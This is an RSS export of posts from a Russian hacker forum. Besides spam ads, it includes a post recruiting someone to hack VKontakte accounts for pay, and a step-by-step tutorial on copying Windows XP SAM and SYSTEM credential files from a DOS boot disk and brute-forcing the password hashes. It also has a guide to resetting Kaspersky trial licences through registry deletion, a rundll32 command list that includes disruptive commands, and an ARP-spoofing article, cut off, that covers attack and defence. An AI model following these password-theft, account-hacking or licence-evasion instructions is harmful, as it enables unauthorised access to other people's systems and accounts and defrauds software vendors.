<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<atom:link href="https://hackerforum.0pk.me/export.php?type=rss" rel="self" type="application/rss+xml" />
		<title>Хакерский форум</title>
		<link>https://hackerforum.0pk.me/</link>
		<description>Хакерский форум</description>
		<language>ru-ru</language>
		<lastBuildDate>Fri, 30 Jun 2023 23:24:52 +0300</lastBuildDate>
		<generator>MyBB/mybb.ru</generator>
		<item>
			<title>Топовые мобильные прокси фермы MobileProxy.ru</title>
			<link>https://hackerforum.0pk.me/viewtopic.php?pid=17#p17</link>
			<description>&lt;p&gt;&lt;a href=&quot;https://postimages.org/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://i.postimg.cc/Y2VrXMMs/topgoods.jpg&quot; alt=&quot;https://i.postimg.cc/Y2VrXMMs/topgoods.jpg&quot; /&gt;&lt;/a&gt; Внимание, владельцы бизнеса! Представляем вам уникальное решение для оптимизации вашего интернет-присутствия - топовые мобильные прокси фермы от Mobileproxy.ru! &amp;#9989; Наше оборудование это передовое устройство, которое позволяет вам выходить в интернет сразу с нескольких IP-адресов из одного места. &amp;#9989; Однако важно отметить, что наша техника не обеспечивает анонимность и она не предназначена для обхода блокировок, выход в сеть осуществляется с использованием купленных вами сим-карт. &amp;#9989; Теперь самое интересное! Приобретая оборудование от Mobileproxy.ru с использованием промокода s455, вы получаете невероятную скидку в размере 5000 рублей! Это отличная возможность сэкономить и воспользоваться передовыми технологиями для вашего бизнеса. &amp;#9989; Наши мобильные прокси фермы откроют перед вами широкие возможности. Вы сможете одновременно управлять несколькими аккаунтами, заниматься продвижением сайтов, сдавать прокси ферму в аренду, собирать данные с разных источников одновременно и многое другое где нужно одновременно несколько подключений к сети и периодическая смена ip адреса. С Mobileproxy.ru ваш бизнес будет оперативным, эффективным и успешным! &amp;#9989; Не упустите возможность улучшить свое интернет-присутствие и сэкономить деньги! Посетите наш веб-сайт &amp;lt;a href=&amp;quot;https://mobileproxy.ru/&amp;quot;&amp;gt;MobileProxy.ru&amp;lt;/a&amp;gt;, выберите подходящее оборудование, введите промокод s455 при оформлении заказа и получите скидку в размере 5000 рублей! &amp;#9989; Mobileproxy.ru - ваш надежный партнер для успешного интернет-бизнеса!&lt;/p&gt;</description>
			<author>mybb@mybb.ru (htqqlkqcci)</author>
			<pubDate>Fri, 30 Jun 2023 23:24:52 +0300</pubDate>
			<guid>https://hackerforum.0pk.me/viewtopic.php?pid=17#p17</guid>
		</item>
		<item>
			<title>Ремонт компьютеров,ноутбуков по России</title>
			<link>https://hackerforum.0pk.me/viewtopic.php?pid=16#p16</link>
			<description>&lt;p&gt;Компьютеры, ноутбуки - техника современная и не застрахована от поломок. К такому типу техники нужен своевременный и комплексный подход, который могут обеспечить наши компетентные мастера. Самостоятельно починить компьютер сможет 5 человек из 100, а поломки происходят у каждого второго! Мы предоставляем услуги высокого качества по ремонту и исправлению проблем компьютерной техники более чем в 60 городах по РФ. Так же наши филиалы представлены в Республике Беларусь. Заявки обрабатываются нашими сотрудниками и не перепродаются в сторонние компании. Перейти:&amp;#160; &lt;a href=&quot;https://rempc-v-mo.ru/?t=33705&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;https://rempc-v-mo.ru/?t=33705&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (htqqlkqcci)</author>
			<pubDate>Fri, 17 Mar 2023 11:54:54 +0300</pubDate>
			<guid>https://hackerforum.0pk.me/viewtopic.php?pid=16#p16</guid>
		</item>
		<item>
			<title>Хакер признался во взломе сети Пентагона</title>
			<link>https://hackerforum.0pk.me/viewtopic.php?pid=14#p14</link>
			<description>&lt;p&gt;Нужен человек, способный взламывать страницы ВКонтакте.&lt;br /&gt;От 20 страниц в неделю, работа стабильная, оплата по факту либо работаем через гаранта. &lt;/p&gt;
						&lt;p&gt;Связь:&lt;br /&gt;ICQ - 698882980&lt;br /&gt;Почта: ivakaha@yandex.ru&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Ktdf)</author>
			<pubDate>Wed, 16 Sep 2015 19:26:37 +0300</pubDate>
			<guid>https://hackerforum.0pk.me/viewtopic.php?pid=14#p14</guid>
		</item>
		<item>
			<title>Снятие защиты StarForce любых версий</title>
			<link>https://hackerforum.0pk.me/viewtopic.php?pid=13#p13</link>
			<description>&lt;p&gt;где смотреть рисунок?&lt;/p&gt;</description>
			<author>mybb@mybb.ru (BARS)</author>
			<pubDate>Fri, 02 Nov 2012 19:59:46 +0400</pubDate>
			<guid>https://hackerforum.0pk.me/viewtopic.php?pid=13#p13</guid>
		</item>
		<item>
			<title>Локальный взлом Windows XP</title>
			<link>https://hackerforum.0pk.me/viewtopic.php?pid=12#p12</link>
			<description>&lt;p&gt;Итак, надо узнать пароли пользователей.&lt;/p&gt;
						&lt;p&gt;Где же они? - Они в: &amp;lt;Системный диск&amp;gt;:\&amp;lt;директория винды&amp;gt;\system32\config&lt;/p&gt;
						&lt;p&gt;Нам нужно два файла: sam &amp;amp; system.&lt;/p&gt;
						&lt;p&gt;Собственно sam это база и есть. А system нам нужно, т.к. в експюшке применяется дополнительно шифровка с помощью syskey.&lt;/p&gt;
						&lt;p&gt;Но там вовсе не пароли! Там хеши (т.е. попросту говоря пароли зашифрованы). Это грустно. А значит нужно будет «достать оттуда пароли». Но не все сразу сначала нужно хоть хеши получить!&lt;/p&gt;
						&lt;p&gt;Просто скопировать эти файлы не выйдет! Винда не настолько тупая.&lt;/p&gt;
						&lt;p&gt;Тогда как? – &lt;/p&gt;
						&lt;p&gt;Загрузится с под другой оси и винда нам не помешает! Например из другой винды. Не подходит? Тогда можно загрузится из MS-DOS. Да да, именно!&lt;/p&gt;
						&lt;p&gt;Где ее достать? Можно купить диск со всякими там загрузочными «фичами», в том числе и с MS-DOS. А можно создать загрузочную дискетку с той же MS-DOS.&lt;/p&gt;
						&lt;p&gt;Как? Вставляем дискетку -) выбираем ее в проводнике -) жмем правой -) форматировать -) ставим&amp;#160; птичку на создание загрузочного диска MS-DOS.&lt;/p&gt;
						&lt;p&gt;ОК. Теперь перегружаемся -) идет загрузка с дискеты. Не идет? Тогда перегружаем еще раз и жмем после появления экрана BIOS del илиdelete если производства Award или&amp;#160; F2 для AMI. Мы попали в меню настроек. Ищем че-то типа Boot priority(очередь опрашивания устройств на предмет загрузки). Первым надо поставить floopy, тобишь чтоб первым искало на дискете. Вторым лучьше поставить дисковод для дисков, ну а третьим соответственно винчестер.&lt;/p&gt;
						&lt;p&gt;Фух. Жмем F10. Сохранить изменения? – Да.&lt;/p&gt;
						&lt;p&gt;Опля! Пошла загрузка MS-DOS. Появилось приглашение типа A:\&amp;gt;&lt;/p&gt;
						&lt;p&gt;ОК. Надо скопировать файлы. Пишем для копирования SAM: copy &amp;lt;Системный диск&amp;gt;:\&amp;lt;директория винды&amp;gt;\system32\config\sam &amp;lt;Польный путь к месту куда хотим скопировать&amp;gt;&lt;/p&gt;
						&lt;p&gt;И аналогично дляsystem. Напримерcopy C:\windows\system32\system A: &lt;/p&gt;
						&lt;p&gt;В этом случае файл system скопируется на дискету. У одних могло получится а у других нет. Основная причина то, что у кого то винда стоит на разделе с&amp;#160; FAT32 а у другого NTFS.C FAT32 проблем недолжно быть. А вот для того чтобы ДОС увидел NTFSнадо предварительно скопировать на дискету файл ntfsdos – это дайвер для DOS, который позволяет определить, посмотреть и смонтировать NTFS-разделы жесткого диска. После загрузки ДОСа запускаем драйвер -) пишем ntfsdos.exe Буквы жестки дисков поменяются! C: станет D: и т.п. &lt;/p&gt;
						&lt;p&gt;Теперь опять можно копировать файлы.&lt;/p&gt;
						&lt;p&gt;Ура! Файлы скопированы. Но ведь оттуда надо&amp;#160; «достать пароли»? Как? – Нам поможет SAMInside. Это самая быстрая прога для подбора пароля. Суем ей файл SAM -) она спросит SYSTEM -) даем и этот. Теперь видны имена пользователей. Выбираем пользователя и запускаем перебор. Можно по словарю, можно перебором всех возможных комбинаций. Можно еще… вообщем полазьте посмотрите как там можно. Единственное.. что ж выбрать атаку на LM или на NT? Сразу скажу что если можно LM то смело выберайте именно его – это ваш наибольший шанс! Если же нельзя, то пароль может включать еще и заглавные буквы, да и кто-его знает что еще. В этом случае при достаточной длине и сложном пароле ваш перебор может в разумные сроки вообще недать результатов! Вот-так вот грусно. Да, еще одно: перебор может длится часами, днями а то и дольше как отмечалось (бесконечность?). Но не так все плачевно! J Обычно пользователи выбирают весьма короткие (до 7 знаков) пароли.&lt;/p&gt;
						&lt;p&gt;Ntfsdos &lt;a href=&quot;http://www.driverov.net/soft/download-7102.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.driverov.net/soft/download-7102.html&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;SAMInside &lt;a href=&quot;http://megaurl.net/02006&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://megaurl.net/02006&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;P.S: Возможно далее будет…&lt;/p&gt;
						&lt;p&gt;Я не несу ответственности за то что вы сделаете обладая этими знаниями. Информация предоставлена исключительно для ознакомления.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Tue, 15 Dec 2009 17:16:11 +0300</pubDate>
			<guid>https://hackerforum.0pk.me/viewtopic.php?pid=12#p12</guid>
		</item>
		<item>
			<title>Полезности rundll32.exe</title>
			<link>https://hackerforum.0pk.me/viewtopic.php?pid=11#p11</link>
			<description>&lt;p&gt;rundll32 rnaui.dll,RnaWizard - вызов мастера &amp;quot;Удаленный доступ к сети&amp;quot;. &lt;/p&gt;
						&lt;p&gt;rundll32 rnaui.dll,RnaWizard /1 - вызов мастера &amp;quot;Удаленный доступ к сети&amp;quot; без отображения начального окна. &lt;/p&gt;
						&lt;p&gt;rundll32 shell,ShellExecute - открыть Проводник (папка &amp;quot;Рабочий стол&amp;quot;). &lt;/p&gt;
						&lt;p&gt;rundll32 shell32,Control_RunDLL - открыть в Проводнике папку &amp;quot;Панель управления&amp;quot;. &lt;/p&gt;
						&lt;p&gt;программ&amp;quot;, в котором будет открыта вкладка с номером &amp;quot;n&amp;quot; (от 1 до 3). &lt;/p&gt;
						&lt;p&gt;rundll32 shell32,Control_RunDLL main.cpl @0 - открыть диалог &amp;quot;Свойства мыши&amp;quot;. &lt;/p&gt;
						&lt;p&gt;rundll32 shell32,Control_RunDLL main.cpl @1 - открыть диалог &amp;quot;Свойства клавиатуры&amp;quot;. &lt;/p&gt;
						&lt;p&gt;rundll32 shell32,Control_RunDLL main.cpl @2 - открыть папку &amp;quot;Принтеры&amp;quot;. &lt;/p&gt;
						&lt;p&gt;rundll32 shell32,Control_RunDLL main.cpl @3 - открыть папку &amp;quot;Шрифты&amp;quot;. &lt;/p&gt;
						&lt;p&gt;rundll32 SHELL32,Control_RunDLL modem.cpl, add - открыть диалог &amp;quot;Свойства модема&amp;quot;. &lt;/p&gt;
						&lt;p&gt;rundll32 shell32,Control_RunDLL timedate.cpl - открыть диалог &amp;quot;Дата и время&amp;quot;. * &lt;/p&gt;
						&lt;p&gt;rundll32 shell32,OpenAs_RunDLL - вызвать диалог &amp;quot;Открыть с помощью...&amp;quot;. &lt;/p&gt;
						&lt;p&gt;rundll32 shell32,ShellAboutA HACKZONE.RU - информация о версии Windows. &lt;/p&gt;
						&lt;p&gt;rundll32 shell32,SHExitWindowsEx 0 - закрыть все программы, перегрузить оболочку. &lt;/p&gt;
						&lt;p&gt;rundll32 shell32, SHExitWindowsEx 1 - выключить ПК. &lt;/p&gt;
						&lt;p&gt;rundll32 shell32, SHExitWindowsEx 2 - перегрузить ПК. &lt;/p&gt;
						&lt;p&gt;rundll32 shell32,SHExitWindowsEx 4 - принудительно закрыть все программы. &lt;/p&gt;
						&lt;p&gt;rundll32 shell32,SHExitWindowsEx 8 - выход из Windows и выключение ATX-совместимого ПК. &lt;/p&gt;
						&lt;p&gt;rundll32 shell32,SHFormatDrive - вызов диалога форматирования диска А:. &lt;/p&gt;
						&lt;p&gt;rundll32 SHELL32,SHHelpShortcuts_RunDLL AddPrinter - запуск &amp;quot;Мастера установки &lt;br /&gt;принтера&amp;quot;. &lt;/p&gt;
						&lt;p&gt;rundll32 shell32,SHHelpShortcuts_RunDLL Connect - запуск мастера подключения сетевого диска. &lt;/p&gt;
						&lt;p&gt;rundll32 SHELL32,SHHelpShortcuts_RunDLL PrintTestPage - распечатать тестовую страницу. &lt;/p&gt;
						&lt;p&gt;rundll32 sysdm.cpl,InstallDevice_Rundll - вызов мастера установки оборудования. &lt;/p&gt;
						&lt;p&gt;rundll32 url.dll,FileProtocolHandler %1 - открыть веб-страницу, где %1 - URL сайта (включая http://). &lt;/p&gt;
						&lt;p&gt;rundll32 url.dll,MailToProtocolHandler %1 - создать новое письмо, где %1 - e-mail адресата. &lt;/p&gt;
						&lt;p&gt;rundll32 user,CASCADECHILDWINDOWS - расположить все окна каскадом. &lt;/p&gt;
						&lt;p&gt;rundll32 user,TILECHILDWINDOWS - расположить все окна по экрану. &lt;/p&gt;
						&lt;p&gt;rundll32 user,disableoemlayer - сбой системы (!) - выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать. &lt;/p&gt;
						&lt;p&gt;rundll32 user,ExitWindowsExec - быстрая перезагрузка Windows. &lt;br /&gt;&amp;#160; &lt;br /&gt;rundll32 user,WNetDisconnectDialog - вызов диалога &amp;quot;Отключение сетевого диска&amp;quot;. &lt;/p&gt;
						&lt;p&gt;rundll32 AppWiz.Cpl,NewLinkHere %1 - запуск мастера создания нового ярлыка, где %1 - путь к исходному файлу. &lt;/p&gt;
						&lt;p&gt;rundll32 shell32.dll,Control_RunDLL hotplug.dll - диалоговое окно Отключение или извлечение аппаратного устройства &lt;/p&gt;
						&lt;p&gt;rundll32 мсprint2.dll,RUNDLL_PrintTestPage - распечатать тестовую страницу на принтере. &lt;/p&gt;
						&lt;p&gt;rundll32 netplwiz.dll,AddNetPlaceRunDll - вызов мастера подключения нового сетевого ресурса &amp;quot;Добавление в сетевое окружение&amp;quot;. &lt;/p&gt;
						&lt;p&gt;rundll32 user,RepaintScreen - выполнить команду &amp;quot;Обновить&amp;quot;. &lt;/p&gt;
						&lt;p&gt;rundll32 user,SetCaretBlinkTime n - задать частоту мигания курсора, соответствующую значению параметра n. &lt;/p&gt;
						&lt;p&gt;rundll32 user,SetCursorPos - переместить курсор мыши в верхний левый угол экрана. &lt;/p&gt;
						&lt;p&gt;rundll32 user,SetDoubleClickTime n - задать скорость двойного нажатия левой кнопки мыши (Double Click), соответствующую параметру n. &lt;/p&gt;
						&lt;p&gt;rundll32 user,SwapMouseButton - поменять местами клавиши мыши (обратная смена невозможна). &lt;/p&gt;
						&lt;p&gt;rundll32 user,WNetConnectDialog - вызов диалога &amp;quot;Подключение сетевого диска&amp;quot;. &lt;/p&gt;
						&lt;p&gt;все из башки &lt;br /&gt;ну и из книжек конечно&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Tue, 15 Dec 2009 17:12:40 +0300</pubDate>
			<guid>https://hackerforum.0pk.me/viewtopic.php?pid=11#p11</guid>
		</item>
		<item>
			<title>Дурим каспера, и продлеваем срок пробного действия ключей!</title>
			<link>https://hackerforum.0pk.me/viewtopic.php?pid=9#p9</link>
			<description>&lt;p&gt;Многие из нас, дорогие мои коллеги, переустанавливая систему, да и просто, когда в конце концов понимают, что необходима защита, задумываются, какой бы антивирусник установить хороший, да что бы вирусы ловил, и обновлялся постоянно! Устанавливая касперского, например, ключ покупать нет денег, думаем возьмем ка пробный ключик на месяц, а там видно будет....&lt;/p&gt;
						&lt;p&gt;Пройдя месяц мы удаляем касперского, так как тот просит коммерческий ключ.&lt;/p&gt;
						&lt;p&gt;Но есть выход каждый месяц дурить антивирус и продливать его ещё на месяц. &lt;/p&gt;
						&lt;p&gt;ВАЖНО ВЫПОЛНЯТЬ ДЕЙСТВИЯ СТРОГО ПО НИЖЕСЛЕДУЮЩЕЙ ИНСТРУКЦИИ ВО ИЗБЕЖАНИЕ НЕПОЛАДОК В РАБОТЕ ВСЕЙ СИСТЕМЫ!!!&lt;/p&gt;
						&lt;p&gt;1. Выключаем антивирус в нижнем правом углу, нажав на него правой кнопкой мыши- выход.&lt;br /&gt;&amp;#160; &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; &lt;/p&gt;
						&lt;p&gt;2. Нажимаем ПУСК=&amp;gt; ВЫПОЛНИТЬ. В поле ввода команды набираем REGEDIT.&lt;br /&gt;Нажимаем ОК.&lt;br /&gt; &lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt; &lt;/p&gt;
						&lt;p&gt;3. Далее запустится программа для редактирования реестра.&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;В левой части окна проследуем по следующему адресу.&lt;br /&gt;HKEY_LOCAL_MACHINE =&amp;gt; SOFTWARE =&amp;gt; Microsoft =&amp;gt; SystemCertificates =&amp;gt; SPC =&amp;gt; Certificates =&amp;gt; &lt;br /&gt;&lt;br /&gt; &lt;/p&gt;
						&lt;p&gt;В папке Certificates нужно полностью очистить содержимое. Т. Е . удалить 3, находящиеся в ней папки, выделив по очереди каждую из папок правой кнопкой и удаляем.&lt;br /&gt;Внимание! Названия папок могут отличаться от названия папок на рисунке.&lt;br /&gt;Все равно удаляем все содержимое папки Certificates.&lt;br /&gt;&lt;br /&gt; &lt;/p&gt;
						&lt;p&gt;4. Следующим шагом будет удаление еще одного ключа в реестра.&lt;br /&gt;Пройдя по адресу &lt;br /&gt;HKEY_LOCAL_MACHINE =&amp;gt; SOFTWARE =&amp;gt; KasperskyLab =&amp;gt; LicStorage =&amp;gt;&lt;br /&gt;При нажатии на LicStorage в правой части редактора появляется двоичный ключ под названием KIS или KAV, выделяем его правой кнопкой мыши, удаляем.&lt;br /&gt;&lt;br /&gt; &lt;/p&gt;
						&lt;p&gt;5. ВНИМАНИЕ!!!!! После выше произведенных действий обязательно перезагружаем компьютер сразу. После перезагрузки Антивирус попросит зарегистрировать версию. Выбираем графу с временной регистрацией ПРИ ВЫПОЛНЕНИИ ДЕЙСТВИЙ ГРАФЫ 5 НЕОБХОДИМО ИМЕТЬ СОЕДИНЕНИЕ С ИНТЕРНЕТОМ. . И антивирус продлен еще на один месяц. &lt;br /&gt;ПОЗДРАВЛЯЮ.&lt;br /&gt;Так же эту статью можно скачать в формате Word 2003 по следующей ссылке&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Tue, 15 Dec 2009 16:57:58 +0300</pubDate>
			<guid>https://hackerforum.0pk.me/viewtopic.php?pid=9#p9</guid>
		</item>
		<item>
			<title>Протокол ARP и атаки с его использованием</title>
			<link>https://hackerforum.0pk.me/viewtopic.php?pid=8#p8</link>
			<description>&lt;p&gt;ARP-spoofing (ARP-poisoning) — техника сетевой атаки применяемая преимущественно в Ethernet, но возможная и в других, использующих протокол ARP сетях, основанная на использовании недостатков протокола ARP и позволяющая перехватывать трафик между узлами, которые расположены в пределах одного широковещательного домена. &lt;/p&gt;
						&lt;p&gt;В статье детально описана техника атаки ARP-spoofing, рассмотрены такие методы обнаружения и предотвращения ARP-атак,использование VLAN и PPPoE. &lt;br /&gt;Что такое и для чего нужен ARP &lt;/p&gt;
						&lt;p&gt;Протокол ARP предназначен для преобразования IP-адресов в MAC-адреса. Чаще всего речь идёт преобразовании в адреса Ethernet, но ARP используется и в сетях других технологий: Token Ring, FDDI и других. &lt;/p&gt;
						&lt;p&gt;Дополнительная информация: &lt;br /&gt;Address Resolution Protocol — страница в WikipediA &lt;br /&gt;RFC 826 — описание стандарта ARP &lt;br /&gt;Алгоритм работы ARP &lt;/p&gt;
						&lt;p&gt;Протокол может использоваться в следующих случаях: &lt;br /&gt;Хост A хочет передать IP-пакет узлу B, находящемуся с ним в одной сети; &lt;br /&gt;Хост A хочет передать IP-пакет узлу B, находящемуся с ним в разных сетях, и пользуется для этого услугами маршрутизатора R. &lt;/p&gt;
						&lt;p&gt;В любом из этих случае узлом A будет использоваться протокол ARP, только в первом случае для определения MAC-адреса узла B, а во втором — для определения MAC-адреса маршрутизатора R. В последнем случае пакет будет передан маршрутизатору для дальнейшей ретрансляции. &lt;/p&gt;
						&lt;p&gt;Далее для простоты рассматривается первый случай, когда информацией обмениваются узлы, находящиеся непосредственном в одной сети. (Случай когда пакет адресован узлу находящемуся за маршрутизатором отличается только тем, что в пакетах передаваемых после того как ARP-преобразование завершено, используется IP-адрес получателя, но MAC-адрес маршрутизатора, а не получателя.) &lt;br /&gt;Проблемы ARP &lt;/p&gt;
						&lt;p&gt;Протокол ARP является абсолютно незащищённым. Он не обладает никакими способами проверки подлинности пакетов: как запросов, так и ответов. Ситуация становится ещё более сложной, когда может использоваться самопроизвольный ARP (gratuitous ARP). &lt;/p&gt;
						&lt;p&gt;Самопроизвольный ARP — такое поведение ARP, когда ARP-ответ присылается, когда в этом (с точки зрения получателя) нет особой необходимости. Самопроизвольный ARP-ответ это пакет-ответ ARP, присланный без запроса.Он применяется для определения конфликтов IP-адресов в сети: как только станция получает адрес по DHCP или адрес присваивается вручную, рассылается ARP-ответ gratuitous ARP. &lt;/p&gt;
						&lt;p&gt;Самопроизвольный ARP может быть полезен в следующих случаях: &lt;br /&gt;Обновление ARP-таблиц, в частности, в кластерных системах; &lt;br /&gt;Информирование коммутаторов; &lt;br /&gt;Извещение о включении сетевого интерфейса. &lt;/p&gt;
						&lt;p&gt;Несмотря на эффективность самопроизвольного ARP, он является особенно небезопасным, поскольку с его помощью можно уверить удалённый узел в том, что MAC-адрес какой-либо системы, находящейся с ней в одной сети, изменился и указать, какой адрес используется теперь. &lt;/p&gt;
						&lt;p&gt;Подробнее: &lt;br /&gt;Gratuitous_ARP на wiki.wireshark.org &lt;br /&gt;ARP-spoofing &lt;/p&gt;
						&lt;p&gt;До выполнения ARP-spoofing&#039;а в ARP-таблице узлов A и B существуют записи с IP- и MAC-адресами друг друга. Обмен информацией производится непосредственно между узлами A и B. &lt;/p&gt;
						&lt;p&gt;В ходе выполнения ARP-spoofing&#039;а компьютер C, выполняющий атаку, отправляет ARP-ответы (без получения запросов): &lt;br /&gt;узлу A: с IP-адресом узла B и MAC-адресом узла C; &lt;br /&gt;узлу B: с IP-адресом узла A и MAC-адресом узла C. &lt;/p&gt;
						&lt;p&gt;В силу того что компьютеры поддерживают самопроизвольный ARP (gratuitous ARP), они модифицируют собственные ARP-таблицы и помещают туда записи, где вместо настоящих MAC-адресов компьютеров A и B стоит MAC-адрес компьютера C.&amp;#160; &lt;/p&gt;
						&lt;p&gt;После того как атака выполнена, когда компьютер A хочет передать пакет компьютеру B, он находит в ARP-таблице запись (она соответствует компьютеру C) и определяет из неё MAC-адрес получателя. Отправленный по этому MAC-адресу пакет приходит компьютеру C вместо получателя. Компьютер C затем ретранслирует пакет тому, кому он действительно адресован — т.е. компьютеру B. &lt;br /&gt;Методы обнаружения &lt;br /&gt;Программа arpwatchотслеживает всю ARP-активность на указанных интерфейсах. Когда она замечает аномалии, например, изменение MAC-адреса при сохранении IP-адреса, или наоборот, она сообщает об этом в syslog. &lt;br /&gt;XArp — аналог arpwatch для Windows &lt;br /&gt;remarp — аналог arpwatch, работающий через SNMP &lt;br /&gt;* ArpStar — система автоматического обнаружения и предотвращения ARP-spoofing&#039;a; возможно восстановление ARP-таблицы заражённых узлов &lt;br /&gt;Методы предотвращения &lt;/p&gt;
						&lt;p&gt;Борьба с ARP-spoofing&#039;ом с помощью arpwatch и подобных инструментов оказывается хотя и очень простой, но далеко не эффективной. &lt;br /&gt;Во-первых, для того чтобы зафиксировать атаку, на защищаемых узлах должна работать программа arpwatch (или аналогичная). В том случае если она запущена только на одном из двух узлов, подвергающихся ARP-spoofing&#039;у, существует возможность незамеченной односторонней атаки. &lt;br /&gt;Во-вторых, и это более важно, arpwatch позволяет только зафиксировать атаку, но он не в состоянии её предотвратить. &lt;/p&gt;
						&lt;p&gt;Для предотвращения последствий атаки необходимо вмешательство администратора или внешней системы. В первом случае между обнаружением и реакцией администратора может пройти слишком много времени. Во втором вмешательство не требуется, реакция выполняется автоматически: как только ARP-аномалия зафиксирована, определяется порт коммутатора, к которому подключён источник аномалии, и порт блокируется до выяcнения. Однако, такой подход имеет большой недостаток -- он может быть использован для выполнения DOS атаки: достаточно только узнать MAC адрес компьютера, который надо отключит от сети, и сымитировать атаку с этого компьютера. Дальше наша система обнаружения и предотвращения ARP-spoofing&#039;а все сделает сама. &lt;/p&gt;
						&lt;p&gt;В основе рассматриваемых способов противодействия ARP-атакам лежат два совершенно раличных принципа, каждый из которых обладает как достоинствами, так и недостатками. &lt;/p&gt;
						&lt;p&gt;Оба способа, помимо того что они надёжно защищают от ARP-spoofing&#039;а имеют ещё то преимущество, что позволяют полностью контролировать трафик -- не только тот, что проходит через шлюз, но и тот, который циркулирует между машинами (В случае использования PPPoE машины могут по взаимному согласию обмениваться данными между собой напрямую. В случае использования VLAN такой возможности они лишены напрочь.) &lt;br /&gt;Статический ARP &lt;/p&gt;
						&lt;p&gt;Можно бороться со слабостями протокола ARP кардинально -- просто не использовать его. ARP-таблицу можно сформировать вручную, при этом она становится неуязвимой к ARP-атакам. Для этого нужно добавить необходимые MAC-адреса в таблицу. &lt;/p&gt;
						&lt;p&gt;Если при этом отключить использование ARP на сетевых интерфейсах, то доступны будут только те системы, (1) MAC-адреса которых добавлены в ARP-таблицу нашего узла и (2) наш MAC-адрес добавлен в ARP-таблицы узлов, с которыми производится обмен трафиком. &lt;/p&gt;
						&lt;p&gt;Если не отключать использование ARP на сетевых интерфейсах, MAC-адрес заданный статически имеет приоритет. Если MAC-адрес для какого-то IP-адреса не задан, используется ARP-запрос. &lt;br /&gt;Преимущества и недостатки &lt;/p&gt;
						&lt;p&gt;Метод ручного формирования ARP-таблиц имеет следующие недостатки: &lt;br /&gt;добавляется много рутинной работы, связанной с добавлением и модификацией MAC-адресов. Каждое изменение в сети, связанное с заменой или перестановкой сетевых карт, должно сопровождаться редактирование ARP-таблиц в файлах. &lt;br /&gt;клиентские узлы остаются по-прежнему уязвимыми к ARP-spoofing&#039;у. &lt;br /&gt;Другие методы борьбы с ARP-spoofing&#039;ом &lt;/p&gt;
						&lt;p&gt;К сожалению, этот метод не применим к Windows-системам, и другим системам, работающим под управлением ОС, исходный код которых недоступен. &lt;/p&gt;
						&lt;p&gt;Необходимо решить проблему кардинально: нужно так построить сеть, чтобы выполнение ARP-spoofing&#039;а в ней было принципиально невозможно. А если возможным, то бесполезным. &lt;/p&gt;
						&lt;p&gt;Это можно сделать двумя способами: &lt;br /&gt;Ограничить для каждого узла широковещательный домен до уровня двух узлов: самого узла и ближайшего шлюза. подробнее. Почему атаку невозможно выполнить в этом случае. Тогда атаку просто некому выполнять -- нужен третий. А его нет. &lt;br /&gt;Сделать так чтобы все, абсолютно все, передаваемые в сети данные были зашифрованы и прослушивание этих данных, ни к чему бы не привело. Любое же изменение данных, в случае возникновения, сразу же обнаружено. То есть, фактически сеть должна быть такой же и безопасной при использовании вместо коммутатора концентратора. &lt;/p&gt;
						&lt;p&gt;Первый способ делается с помощью VLAN&#039;ов. Второй -- с помощью PPPoE. &lt;br /&gt;Использование VLAN &lt;br /&gt;Основная статья: VLAN &lt;/p&gt;
						&lt;p&gt;Компьютер C может использовать ARP-spoofing против компьютера Aтолько в том случае, если они находятся в одной сети канального уровня. В том случае, если они разделены маршрутизатором, атака невозможна (возможна атака на маршрутизатор, но это совсем другое дело). &lt;/p&gt;
						&lt;p&gt;VLAN&#039;ы помогают сегментировать сеть -- превратить одну сеть в множество изолированных на канальном уровне фрагментов, которые соединены между собой маршрутизатором. Атака ARP-spoofing возможна только между компьютерами находящимися в одном VLAN&#039;е. В наиболее крайнем случае, когда в каждом VLAN&#039;е находится только два компьютера: собственно компьютер и маршрутизатор, атака ARP-spoofing становится невозможной в принципе. К сожалению, такая организация сети являются очень требовательной к ресурсам маршрутизатора и используется редко. &lt;br /&gt;Преимущества &lt;br /&gt;От клиента ничего не требуется. Он работает, как и работал. Если IP-адрес задан статически, необходима смена IP-адреса и сетевой маски. &lt;br /&gt;Данные не шифруются, и производительность не теряется. Малые потери на дополнительные поля в заголовке. &lt;br /&gt;Нельзя организовать обмен данными в обход шлюза между узлами в разных VLAN&#039;ах. Если каждый узел находится в собственном VLAN&#039;е такой обмен невозможен вообще. &lt;br /&gt;Недостатки &lt;br /&gt;Необходима поддержка VLAN&#039;ов коммутатором. &lt;br /&gt;Необходимо потратить время на настройку VLAN&#039;ов, дополнительную настройку DHCP&#039;сервера. &lt;br /&gt;Данные не шифруются. Если их прослушивание каким-то образом удастся, то они могут быть прочтены и/или модифицированы. &lt;br /&gt;Использование PPPoE &lt;br /&gt;Основная статья: PPPoE &lt;br /&gt;Преимущества &lt;br /&gt;Данные шифруются &lt;br /&gt;Нет никаких требований к железу. Даже не обязательно чтобы сеть была коммутируемой &lt;br /&gt;Недостатки &lt;br /&gt;На клиенте требуется настройка доступа по PPPoE. На некоторых системах требуется инсталляция специального клиентского программного обеспечения. &lt;br /&gt;За счёт потерь на инкапсуляцию, снижается производительность сети. Если выполняется шифрование данных, то временные потери увеличиваются. &lt;br /&gt;При взаимном согласии сторон можно организовать обмен данными между узлами в обход шлюза. &lt;br /&gt;При большом количестве соединений PPPoE (&amp;gt;200) возрастает нагрузка на центральный процессор сервера. Иногда, приходится жертвовать шифрованием данных. &lt;br /&gt;Если будет большая 